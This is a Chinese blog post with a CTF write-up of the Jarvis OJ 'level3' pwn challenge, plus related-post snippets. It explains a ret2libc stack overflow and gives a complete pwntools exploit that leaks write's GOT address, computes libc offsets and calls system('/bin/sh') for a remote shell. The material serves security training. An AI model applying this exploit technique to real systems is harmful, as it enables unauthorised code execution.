jarvis oj level3

最新推荐文章于 2024-02-04 12:10:48 发布
最新推荐文章于 2024-02-04 12:10:48 发布
阅读量291 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44932880/article/details/97271447
版权

做题思路

先在终端用file命令查看文件为32位,在对应版本的IDA中打开
在终端用file命令查看文件多少位
用checksec命令查看文件发现 栈无保护,再看伪代码分析可知
在这里插入图片描述
可以在传入buf 时覆盖栈的函数返回地址,即可以返回system函数的地址
再给system传入参数"/bin/sh" 就可以进入服务器的终端得到flag
在这里插入图片描述

大致思路跟第二题是一样的,
但是不同点在于上一题可以直接在IDA里面获得函数system与"/bin/sh"的地址
这一题需要我们用got-plt 表
以及 libc库与got表储存地址的偏移的知识
来获取system地址与"/bin/sh"的地址

本题的难点在于如何得到偏移量
  要得到偏移量我们首先要得到某一个函数在got表里储存的真实地址
  真实地址(本题指在level3里的函数的地址,我看做libc库函数地址的一个映射)
  
  偏移量就是got表里储存的地址与libc库储存相同函数的地址的差值

要得到got表里的真实地址
我们可以利用题中的write函数输出got表里的write函数的真实地址
e=ELF(“level3”)
payload=(0x88+4)*‘A’+p32(e.symbols[‘write’])+p32(0x08048484)+p32(1)+p32(e.got[‘write’])+p32(4)

0x08048484指向main函数: 这样调用完write函数后可以接着进入main函数

这一句就是调用write函数输出了e.got[‘write’] 就是write函数的真实地址
由此可得到偏移量x=true_write-libc.symbols[‘write’]
接着得到 system函数的真实地址
true_sys=x+libc.symbols[‘system’]
与"/bin/sh"的真实地址
true_bin=x+libc.search("/bin/sh").next()
最后在main函数中再次用到栈溢出,进入shell.
代码如下
payload=(0x88+4)*‘A’+p32(true_sys)+p32(0)+p32(true_bin)
在这里插入图片描述
脚本如下

#coding:utf-8
from pwn import *
#context.log_level=“DEBUG”
#p=process("./level3")
p=remote(“pwn2.jarvisoj.com”,9879)
e=ELF(“level3”)
libc=ELF(“libc-2.19.so”)
writ_a=e.symbols[‘write’]
rea=0x08048484
got_write=e.got[‘write’]

p.recv()
payload=(0x88+4)‘A’+p32(writ_a)+p32(rea)+p32(1)+p32(got_write)+p32(4)
p.send(payload)
aaa=p.recv(4)
true_write=u32(aaa)
print hex(true_write)
x=true_write-libc.symbols[‘write’]
true_bin=x+libc.search("/bin/sh").next()
true_sys=x+libc.symbols[‘system’]
payload=(0x88+4)‘A’+p32(true_sys)+p32(0)+p32(true_bin)
p.send(payload)
p.interactive()

轩渊
关注
Jarvis OJ--level3
Kni9hT's Blog
11-10 263
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
Jarvis OJ level1
Kni9hT's Blog
11-08 618
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
jarvis oj level3
CNXBDSa的博客
07-27 411
首先先了解一下libc库的知识详情请移步大佬总结 了解一下plt和got表详情请移步大佬总结 然后是做题过程首先老规矩在ubuntu中checksec+文件名查看有无什么保护机制和位数 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为cana...
Jarvis oj level3
发蝴蝶和大脑斧的博客
12-04 1171
下载下来发现有level3文件和libc.so文件,先checksec,和level2差不多,接着ida打开level3,没找到system函数和bin字符串,没什么办法了。接着去看so文件,libc是Linux下的ANSI C的函数库。找到了system函数和bin字符串。那么怎么利用呢? 首先了解plt和got表。链接 我是这么理解的:plt表中存放的是函数在got表中该项的地址,got表存放...
jarvisoj level3
sun的博客
10-03 1061
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
[BUUCTF]PWN——jarvisoj_level3
BangSen1的博客
03-16 1290
jarvisoj_level3 32位,NX保护。 运行程序。 用IDA打开,shift+f12检索 ,找到关键函数。 参数buf溢出漏洞,利用ret2libc获取shell。 1,利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 328
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
笔记向——PWN jarvis oj level0
m0_52133692的博客
11-11 196
题目下载链接:https://dn.jarvisoj.com/challengefiles/level0.b9ded3801d6dd36a97468e128b81a65d 地址:nc pwn2.jarvisoj.com 9881 本人环境: ida反汇编工具(吾爱破解可下载到) 系统Ubuntu 18.04(linux的一个版本) pwntools(终端输入:sudo pip pwntools install 即可安装) pwndbg(终端输入:sudo clone https://github.com/p
BUUCTF Pwn jarvisoj_level21解题步骤
最新发布
2301_81505831的博客
02-04 266
这里需要注意的是,由于我们是直接调用system()而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件,RELRO和NX保护不影响我们做题。buf到ebp的距离是0x88,ebp到Return的距离是0xF。system的地址可以在plt中找到,双击system.plt。然后在输入shift+F12,可以查找。
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 176
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
jarvisoj_level3
小白垃圾笔记2
05-24 194
思路是通过write泄露write的地址,然后计算偏移。小白垃圾笔记,不建议阅读。拷贝到本地,感觉方便多了。
【BUUCTF】jarvisoj_level3
m0_51251108的博客
12-28 381
【BUUCTF】jarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
[BUU-WP]jarvisoj_level3
m0sway的博客
11-22 800
jarvisoj_level3 使用checksec查看: 只开启了栈不可执行,估计又是一道栈溢出的题目,直接放进IDA中看吧: 主函数中直接给了漏洞函数,跟进去查看: read()函数可以向buf变量中写入0x100而buf距离ebp只有0x88,存在栈溢出 但这道题没有system和/bin/sh,一道标准的ret2libc 用write函数泄露libc地址,找system和/bin/sh exp: from pwn import * #start r = remote("node4.buuo
BUUCTF jarvisoj_level3
红叶的博客
10-27 397
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 325
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
jarvisoj_level3 [r2libc]
、moddemod
06-24 315
exp from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './level3' p = process(proc_name) # p = remote('node3.buuoj.cn', 28793) elf = ELF(proc_name) main_addr = elf.sym['main'] write_plt = elf.plt['write'] write_got = elf..
BUUCTF pwn——jarvisoj_level3
CNS-Enterprise BCC-1701-J
04-21 191
BUUCTF 做题练习
jarvisoj_level0
08-14
- *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值